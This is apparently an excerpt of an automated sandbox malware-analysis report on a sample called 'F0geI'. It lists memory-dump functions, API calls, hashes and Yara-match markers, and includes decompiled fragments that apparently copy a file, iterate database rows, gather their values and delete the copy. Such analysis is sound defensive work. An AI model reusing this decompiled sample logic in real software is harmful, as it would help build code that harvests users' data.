LocalFree.KERNEL32(?,?,?,?,?,02085B3E,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0208652E
LocalFree.KERNEL32(00000000,?,?,?,?,02085B3E,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02086535
LocalFree.KERNEL32(00000000,?,?,?,?,02085B3E,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0208658C
LocalFree.KERNEL32(?,?,?,?,?,02085B3E,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02086596

Strings

`W_, xrefs: 0208637D, 02086390, 0208639D

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: Free$Local$Global
String ID: `W_
API String ID: 67877634-3115881924
Opcode ID: 154df15a1167a433e68271407e97ec1704788d52295b520c09530d825bd9e518
Instruction ID: 7df49a2026407b6ef1b9c46118242cc29039663e99b1d7a0399c2670372baeb5
Opcode Fuzzy Hash: 154df15a1167a433e68271407e97ec1704788d52295b520c09530d825bd9e518
Instruction Fuzzy Hash: 8AA1AA72504301ABDB15EF65DD8496FBBF9EF88310F014928FA94A3260D772D820DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00430DD4 Relevance: 12.2, APIs: 8, Instructions: 222COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 00430DD8
_write_multi_char.LIBCMTD ref: 004315EB
_write_string.LIBCMTD ref: 00431606
_write_multi_char.LIBCMTD ref: 00431632
__mbtowc_l.LIBCMTD ref: 004316A1

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: _write_multi_char$__mbtowc_l_get_int_arg_write_string
String ID:
API String ID: 4186970751-0
Opcode ID: a0cf7bf72d40c6b3fcfa4398c383bd4095b36ac00e10a8f1071b07447650425d
Instruction ID: 59376063915a0a8db93da85e9deece7cf929ebc1784357db36357fb5499e79b7
Opcode Fuzzy Hash: a0cf7bf72d40c6b3fcfa4398c383bd4095b36ac00e10a8f1071b07447650425d
Instruction Fuzzy Hash: 5FA17DF1E002189BDB24CF55CC91BEEB3B5AF48304F14919AE6096B292D7389E84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 02081EEE Relevance: 12.2, APIs: 8, Instructions: 151COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,00000000,00000000,?,00000000,00000000), ref: 02081F2F
PathCombineW.SHLWAPI(?,00000000,0040C79C,?,00000000,00000000), ref: 02081F53
LocalFree.KERNEL32(?,?,00000000,00000000), ref: 02082002
LocalFree.KERNEL32(?,?,00000000,00000000), ref: 0208204C
CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 02082058
LocalFree.KERNEL32(?,?,00000000,00000000), ref: 02082062
LocalFree.KERNEL32(00000000,?,00000000,00000000), ref: 02082069
LocalFree.KERNEL32(00000000,?,00000000,00000000), ref: 02082072

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$CombinePath$CloseHandle
String ID:
API String ID: 2998194811-0
Opcode ID: 7829dc6c71f128cacdf391500ca352a992bf4a38fd881ec11def570a6cd4989f
Instruction ID: 4d1a2d4c893d23cb9b2fc9f3f8898763fc06c0007e7a28529664c84e05759e74
Opcode Fuzzy Hash: 7829dc6c71f128cacdf391500ca352a992bf4a38fd881ec11def570a6cd4989f
Instruction Fuzzy Hash: CB5150B5600215EFEB04DFA5DE84AAF7BB9EB48300F004429F954B3250D770AE20DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00428A58 Relevance: 12.1, APIs: 8, Instructions: 103COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 00428A66

Part of subcall function 00428F40: _cmpBYTE.LIBCMTD ref: 00428F78

_cmpDWORD.LIBCMTD ref: 00428A8D

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: 000ccbe2cadb759e74cd5e7df1b3dfedffdf27a34ef9d4f6f82d792d1a5bf3d5
Instruction ID: 789ec6b790b3460523aa97c3653b34ec8f1834b2997240226c4a151201fd5581
Opcode Fuzzy Hash: 000ccbe2cadb759e74cd5e7df1b3dfedffdf27a34ef9d4f6f82d792d1a5bf3d5
Instruction Fuzzy Hash: 6B315471A02118EFCB04EFBCEA48AAD7B75AB40305F91815EF409AB245DE38AF41DB55

Uniqueness

Uniqueness Score: -1.00%

Function 0042B555 Relevance: 10.7, APIs: 7, Instructions: 165COMMON

Download Yara Rule

APIs

__errno.LIBCMTD ref: 0042B555

Part of subcall function 00419D50: __getptd_noexit.LIBCMTD ref: 00419D56

_memset.LIBCMT ref: 0042B5E6
__errno.LIBCMTD ref: 0042B5EE
__errno.LIBCMTD ref: 0042B5F8
_memset.LIBCMT ref: 0042B6C3
__errno.LIBCMTD ref: 0042B718

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __errno$_memset$__getptd_noexit
String ID:
API String ID: 4262221207-0
Opcode ID: c3de8bdb0bd3d2021b5b8e9d24e112d6a6bb03619bd3f07dca8100efc64d381b
Instruction ID: ea409ff7ec6aca4b4ad4ab9628627815d2f39d53bb3e6b11bd0a1de42637db43
Opcode Fuzzy Hash: c3de8bdb0bd3d2021b5b8e9d24e112d6a6bb03619bd3f07dca8100efc64d381b
Instruction Fuzzy Hash: B4617C70A00219EFCF14CF58D945AAE33B1EF84328F60821AE8296B3D5D7399D41CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00407213 Relevance: 10.6, APIs: 7, Instructions: 145
fileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00407213(intOrPtr* __ecx, intOrPtr _a4, void* _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t24;
				void* _t25;
				void* _t27;
				intOrPtr* _t32;
				intOrPtr* _t39;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t59;
				intOrPtr* _t69;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				void* _t87;
				void* _t89;
				void* _t90;
				void* _t91;

				_t59 = __ecx;
				if(_a8 == 0) {
					L18:
					return 0;
				}
				_t24 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t25 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_a8 = _t25;
				_t87 =  *((intOrPtr*)( *0x40e000))(_t24, _a4,  *0x40e284);
				_t27 = E0040A69E( *0x40e000,  &_a8);
				_t89 = _a8;
				if(_t27 == 0) {
					L16:
					LocalFree(_t87);
					L17:
					DeleteFileW(_t89);
					LocalFree(_t89);
					goto L18;
				}
				_push(0);
				_push(_t89);
				_push(_t87);
				if( *((intOrPtr*)( *0x40e184))() == 0) {
					goto L16;
				}
				_t32 =  *0x40e488; // 0x6d8cda30
				_push( &_v8);
				_push(_t89);
				if( *_t32() != 0) {
					L11:
					DeleteFileW(_t89);
					if(_t89 != 0) {
						LocalFree(_t89);
					}
					if(_t87 != 0) {
						LocalFree(_t87);
					}
					return 1;
				}
				_t39 =  *0x40e494; // 0x6d7eb910
				_t40 =  *_t39(_v8,  *0x40e238, 0xffffffff,  &_a8, 0);
				_t91 = _t90 + 0x14;
				if(_t40 == 0) {
					while(1) {
						_push(_a8);
						_t41 =  *0x40e48c; // 0x6d778060
						if( *_t41() != 0x64) {
							break;
						}
						_t43 =  *0x40e4b4; // 0x6d7724b0
						_t44 =  *_t43(_a8, 0);
						_t69 =  *0x40e4b4; // 0x6d7724b0
						_v12 = _t44;
						_t45 =  *_t69(_a8, 1);
						_t91 = _t91 + 0x10;
						_v16 = _t45;
						_push(_v12);
						if( *((intOrPtr*)( *0x40e08c))() > 1) {
							_t47 = E0040A503( *_t59, _v12);
							_t82 =  *0x40e228; // 0x5f58c0
							 *_t59 = _t47;
							_t48 = E0040A503(_t47, _t82);
							_push(_v16);
							 *_t59 = _t48;
							if( *((intOrPtr*)( *0x40e08c))() > 1) {
								_t51 = E0040A503( *_t59, _v16);
								_t84 =  *0x40e228; // 0x5f58c0
								 *_t59 = _t51;
								_t52 = E0040A503(_t51, _t84);
								_t85 =  *0x40e228; // 0x5f58c0
								 *_t59 = _t52;
								 *_t59 = E0040A503(_t52, _t85);
							}
						}
					}
					 *0x40e4b0(_a8);
					 *0x40e4a4(_v8);
					goto L11;
				} else {
					LocalFree(_t87);
					 *0x40e4b0(_a8);
					 *0x40e4a4(_v8);
					goto L17;
				}
			}

0x00407220
0x00407222
0x004073c0
0x00000000
0x004073c0
0x00407235
0x00407242
0x00407253
0x0040725c
0x0040725e
0x00407263
0x00407268
0x004073ab
0x004073ac
0x004073b2
0x004073b3
0x004073ba
0x00000000
0x004073ba
0x00407274
0x00407276
0x00407277
0x0040727c
0x00000000
0x00000000
0x00407282
0x0040728a
0x0040728b
0x00407292
0x00407389
0x0040738a
0x00407392
0x00407395
0x00407395
0x0040739d
0x004073a0
0x004073a0
0x00000000
0x004073a8
0x00407298
0x004072ae
0x004072b0
0x004072b5
0x00407361
0x00407361
0x00407364
0x0040736f
0x00000000
0x00000000
0x004072db
0x004072e5
0x004072e7
0x004072f2
0x004072f5
0x004072fd
0x00407300
0x00407303
0x0040730b
0x00407312
0x00407317
0x0040731f
0x00407321
0x00407326
0x00407329
0x00407335
0x0040733c
0x00407341
0x00407349
0x0040734b
0x00407350
0x00407358
0x0040735f
0x0040735f
0x00407335
0x0040730b
0x00407378
0x00407381
0x00000000
0x004072bb
0x004072bc
0x004072c5
0x004072ce
0x00000000
0x004072d5

APIs

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(00000000), ref: 004072BC
DeleteFileW.KERNEL32(00000000,?), ref: 0040738A
LocalFree.KERNEL32(00000000), ref: 00407395
LocalFree.KERNEL32(00000000), ref: 004073A0
LocalFree.KERNEL32(00000000), ref: 004073AC
DeleteFileW.KERNEL32(00000000), ref: 004073B3
LocalFree.KERNEL32(00000000), ref: 004073BA

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID:
API String ID: 2194112602-0
Opcode ID: 9df39f122672a985e67cef7ad0bf7d7d168aca4ea3b70408da7777f221d31dd5
Instruction ID: e8c6905146b6e6fcb6e5b83ffe865c27a3063a5e14c3c7fc069cf135c206e258
Opcode Fuzzy Hash: 9df39f122672a985e67cef7ad0bf7d7d168aca4ea3b70408da7777f221d31dd5
Instruction Fuzzy Hash: 17419431504110AFEB099F66EE85E6E37B5EF44320F104839FD15FB2A0DB78A921DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0208747A Relevance: 10.6, APIs: 7, Instructions: 145fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0208A905: LocalFree.KERNEL32(00000000,?,?,02082C15), ref: 0208A968

LocalFree.KERNEL32(00000000), ref: 02087523
DeleteFileW.KERNEL32(00000000), ref: 020875F1
LocalFree.KERNEL32(00000000), ref: 020875FC
LocalFree.KERNEL32(00000000), ref: 02087607
LocalFree.KERNEL32(00000000), ref: 02087613
DeleteFileW.KERNEL32(00000000), ref: 0208761A
LocalFree.KERNEL32(00000000), ref: 02087621

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID:
API String ID: 2194112602-0
Opcode ID: e9d8f00487e522992aaaed3d2169ef1b2b551e54072380db451c7127056c5058
Instruction ID: 21e0ca2827902b42e89e7816628f87c3e4c9259956af767b44b88ebdd5b6f991
Opcode Fuzzy Hash: e9d8f00487e522992aaaed3d2169ef1b2b551e54072380db451c7127056c5058
Instruction Fuzzy Hash: 1C418535600210AFDB09AF66EE44A6E77B5EF45310F108828F915E7260DB74A921EF19

Uniqueness

Uniqueness Score: -1.00%

Function 00420664 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

__un_inc.LIBCMTD ref: 00420818
__inc.LIBCMTD ref: 0042084A
__inc.LIBCMTD ref: 00420909
__mbtowc_l.LIBCMTD ref: 0042094B

Strings

, xrefs: 00420883
{, xrefs: 0042088C

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __inc$__mbtowc_l__un_inc
String ID: ${
API String ID: 579247601-4046706400
Opcode ID: dc69d8516cc11fe7fadc67670a898c0b1153202439d2a7f05566148b15abe76a
Instruction ID: 1055374d518e5f5b73a788cd124758a6c5e3ef42acecea30e9f68282066d24a0
Opcode Fuzzy Hash: dc69d8516cc11fe7fadc67670a898c0b1153202439d2a7f05566148b15abe76a
Instruction Fuzzy Hash: E541E4B0E01368DFCF24DB95E8846EEB7B1AF54304F54829AD41A67313D6389A80CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0042FF07 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042FF68
__aullrem.LIBCMT ref: 00430135
__aulldiv.LIBCMT ref: 00430157

Strings

', xrefs: 0042FF07
0, xrefs: 0042FF23
9, xrefs: 00430168

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$0$9
API String ID: 3120068967-269856862
Opcode ID: d65ada69c6f0448e455e8efc2762e98b2572393252772e8e5edb01c5ee491a82
Instruction ID: ef80cffb82c7ee0d620c241a3dff5ded7c6569a569e687b7e648e20a43cd6067
Opcode Fuzzy Hash: d65ada69c6f0448e455e8efc2762e98b2572393252772e8e5edb01c5ee491a82
Instruction Fuzzy Hash: 4741E571D06229DFDB64CF58D8A9BAEB7B5FB48304F1486EAD008A7240C7399E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00428B84 Relevance: 10.6, APIs: 7, Instructions: 103COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 00428B92

Part of subcall function 00428F40: _cmpBYTE.LIBCMTD ref: 00428F78

_cmpDWORD.LIBCMTD ref: 00428BB9

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: 19dc914e4a0633765d336c19ed3a3f14afb2883500002485b60d4641ba5bd03d
Instruction ID: 09e779532c7962625a25b6a3118f594af604480c47d30444c376482f5ac8ff98
Opcode Fuzzy Hash: 19dc914e4a0633765d336c19ed3a3f14afb2883500002485b60d4641ba5bd03d
Instruction Fuzzy Hash: ED313371A02118EFCB04DFBCEA489AD7B75AB40305F91C15EF449AB209DE38AF45DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00428940 Relevance: 10.6, APIs: 7, Instructions: 96COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 0042894E

Part of subcall function 00428F40: _cmpBYTE.LIBCMTD ref: 00428F78

_cmpDWORD.LIBCMTD ref: 00428975

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: 78c03d3718f2390d31f8b063bc65ce1d810f83c356c66c6654849dcd724319e6
Instruction ID: 9c2e0ac5a81b51015fbc54fc562c241c41ef6e53ee4f6753c511bf4ecc86f314
Opcode Fuzzy Hash: 78c03d3718f2390d31f8b063bc65ce1d810f83c356c66c6654849dcd724319e6
Instruction Fuzzy Hash: A9317471A02118EFCB04EFBCEA48AAD7B75AB40305F91815EE449B7205DE38EF41DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00420A0A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

__inc.LIBCMTD ref: 00420A69
__inc.LIBCMTD ref: 00420A9C
_isxdigit.LIBCMTD ref: 00420BBD
__hextodec.LIBCMTD ref: 00420BF0
_isdigit.LIBCMTD ref: 00420C16
__inc.LIBCMTD ref: 00420D00
__un_inc.LIBCMTD ref: 00420D24

Strings

p, xrefs: 00420BAF
0, xrefs: 00420A4F

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __inc$__hextodec__un_inc_isdigit_isxdigit
String ID: 0$p
API String ID: 500523077-2059906072
Opcode ID: b0356fd5653e0a6f6e224d2ad77bfed6b82b230c62960876a50289a7ee23f875
Instruction ID: a3020a5fbde0ace490a1d92676205228b3d3f57a385478ac9b20bcf3b838cca1
Opcode Fuzzy Hash: b0356fd5653e0a6f6e224d2ad77bfed6b82b230c62960876a50289a7ee23f875
Instruction Fuzzy Hash: 3D4154B4E052798BCF25CFA5E8943EEBBF1AF55308F64819BC41966203D2395A81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 020886FC Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 134stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 0208878A
LocalFree.KERNEL32(00000000), ref: 02088860
CloseHandle.KERNEL32(00000000), ref: 0208886E
LocalFree.KERNEL32(00000000), ref: 02088875

Strings

s, xrefs: 020887AD
/, xrefs: 02088760

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$CloseHandlelstrlen
String ID: /$s
API String ID: 3009051031-4105443823
Opcode ID: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
Instruction ID: 9bb8b059f63c9cbeb6201c34840a59bc3802542142248af632147f0826332298
Opcode Fuzzy Hash: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
Instruction Fuzzy Hash: 2941EB70900219FEEB15ABA5CD49FBAB3B8EB44304F40C928E545A7090EBB0AA54DB64

Uniqueness

Uniqueness Score: -1.00%

Function 02089536 Relevance: 9.1, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,02089CDB,00000000,00000000,00000000,00000000,00000000), ref: 0208962C

Part of subcall function 0208A729: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,00000000,00000000), ref: 0208A758

wsprintfW.USER32 ref: 0208964A

Part of subcall function 0208A76A: GlobalFree.KERNEL32(02082C15), ref: 0208A7B7

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,02089CDB,00000000), ref: 02089662
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,02089CDB,00000000), ref: 02089669
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02089CDB,00000000,00000000,00000000,00000000,00000000), ref: 02089678
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02089CDB,00000000,00000000,00000000,00000000,00000000), ref: 02089682

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: Free$Local$ByteCharGlobalInfoMultiSystemWidewsprintf
String ID:
API String ID: 2924325140-0
Opcode ID: a6de5e848d937083b49f0169d3b41f08eb3f60cdac5fbd5286eae1f109443dba
Instruction ID: 0f817151c965c9da1b9ecc7393756ba6b75c3ffa42821ffec44c6cf887885969
Opcode Fuzzy Hash: a6de5e848d937083b49f0169d3b41f08eb3f60cdac5fbd5286eae1f109443dba
Instruction Fuzzy Hash: BB4193B1A00314AFDB04DFA9DDC496ABBF8EB48324B048579FE09E7351D6309D10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02089343 Relevance: 9.1, APIs: 6, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000104,?,?,?,02089CC9,00000000), ref: 020893A6
RegCloseKey.ADVAPI32(00000000,?,?,?,02089CC9,00000000), ref: 020893AF
LocalFree.KERNEL32(00000000,?,?,?,02089CC9,00000000), ref: 020893C2
wsprintfW.USER32 ref: 020893D4

Part of subcall function 0208A76A: GlobalFree.KERNEL32(02082C15), ref: 0208A7B7

LocalFree.KERNEL32(00000000,00000000), ref: 020893EC
LocalFree.KERNEL32(00000000), ref: 020893F3

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: Free$Local$CloseGlobalQueryValuewsprintf
String ID:
API String ID: 923078377-0
Opcode ID: 1195a9609c4ac859f50556a4f5fb5b67e16fe42b1b7cf2e21ecfb1ab86fba5f5
Instruction ID: d8c2d3f332bfd6619ed8a3cfa27ce03d13931f89b9ef80bc5fd377b2cdd941d5
Opcode Fuzzy Hash: 1195a9609c4ac859f50556a4f5fb5b67e16fe42b1b7cf2e21ecfb1ab86fba5f5
Instruction Fuzzy Hash: EA118471200214BBE714ABA6ED89E6B7FBCEB49350B004434F645E3160DAB05920DB78

Uniqueness

Uniqueness Score: -1.00%

Function 0042FEF4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042FF68
__aullrem.LIBCMT ref: 00430135
__aulldiv.LIBCMT ref: 00430157

Strings

0, xrefs: 0042FF23
9, xrefs: 00430168

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 0$9
API String ID: 3120068967-1975997740
Opcode ID: 41ba9041e073bb15ec53c3d68c0243438a2683b8a4d8a65e34a2c78bd0c82506
Instruction ID: 17c75193d5e66341643ac04ad05f83e29f20ddbe34abb2b5208df055b995ecf8
Opcode Fuzzy Hash: 41ba9041e073bb15ec53c3d68c0243438a2683b8a4d8a65e34a2c78bd0c82506
Instruction Fuzzy Hash: 6E41F571D06229DFDB64CF48D8A9BAEB7B5FB49304F5086AAD008A7240C7395E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00431279 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004312E0
__aullrem.LIBCMT ref: 004314B0
__aulldiv.LIBCMT ref: 004314D2

Strings

9, xrefs: 004314E3
', xrefs: 00431279

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$9
API String ID: 3120068967-1823400153
Opcode ID: e8478181fbcf0d97f5aaa5d4289ea9646e2b5478815b3089824e4077cb9ac537
Instruction ID: 33966614cb291029f0c7f667bd4cfbcc9821d282900e84767b526b2402c629c4
Opcode Fuzzy Hash: e8478181fbcf0d97f5aaa5d4289ea9646e2b5478815b3089824e4077cb9ac537
Instruction Fuzzy Hash: 694135B0E002299FDB24CF48C841BAEB7B5FF89314F1051AAD148AB251C3389E81CF1A

Uniqueness

Uniqueness Score: -1.00%

Function 00420B37 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

__inc.LIBCMTD ref: 00420B85
_isxdigit.LIBCMTD ref: 00420BBD
__hextodec.LIBCMTD ref: 00420BF0

Strings

+, xrefs: 00420B50
p, xrefs: 00420BAF

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __hextodec__inc_isxdigit
String ID: +$p
API String ID: 3003077261-1790238857
Opcode ID: d5f280f2fa3220834aed4b8a45a1ba7957958c050bee697402ae40ae9c2d1f26
Instruction ID: 70ae99dea26e9fda4ea79188d22675bc92693f72982ea39d00ca0f601ce3ed33
Opcode Fuzzy Hash: d5f280f2fa3220834aed4b8a45a1ba7957958c050bee697402ae40ae9c2d1f26
Instruction Fuzzy Hash: B33150B0E052A98BCF25CFA5D8543EEBBB1AF15308F5441DBC41966203D2795A81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0041F561 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

__set_error_mode.LIBCMTD ref: 0041F5C8
__set_error_mode.LIBCMTD ref: 0041F5D7

Strings

t/j, xrefs: 0041F601
SN, xrefs: 0041F5B8
jjj, xrefs: 0041F5B0

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __set_error_mode
String ID: jjj$t/j$SN
API String ID: 167136767-292791468
Opcode ID: 0f3f3eb1433c1d13d63198b302bc914cf58cc9f7b1ed1b0aa788c9b33ad61992
Instruction ID: 72bc7d515c62c63b3c953949aec6e500fbe1c61f3963da58caf0db55085d0050
Opcode Fuzzy Hash: 0f3f3eb1433c1d13d63198b302bc914cf58cc9f7b1ed1b0aa788c9b33ad61992
Instruction Fuzzy Hash: D321F474A40108FBDB20CF44E995BEE33B5AB05314F60453AE40A922E2D3399F97DA89

Uniqueness

Uniqueness Score: -1.00%

Function 0208AE3F Relevance: 7.7, APIs: 6, Instructions: 190COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 0208AE87

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: e2b69555ed1fe6fda59851be0d3c6c885782778e094666e903444fae68ab0d1e
Instruction ID: 127d6c6ad1a81d80e4b7af0fb43e67463b57276c501a9568e2a9fa52dbc841ad
Opcode Fuzzy Hash: e2b69555ed1fe6fda59851be0d3c6c885782778e094666e903444fae68ab0d1e
Instruction Fuzzy Hash: E651A1B2604311AFD304EF65DD44A3B76E9EBC8714F004A2DF9A8E7290DB70D9158B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2AA Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 117
memoryCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040A2AA(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _t25;
				void* _t29;
				void* _t30;
				void* _t39;
				void* _t47;
				void* _t52;
				intOrPtr _t54;
				void* _t70;
				void* _t77;
				intOrPtr* _t80;
				void* _t82;
				intOrPtr* _t83;
				signed int _t85;

				_t25 =  *0x40e1b8; // 0x5f58e0
				_v12 = _t25;
				_v20 = __edx;
				_v16 = __ecx;
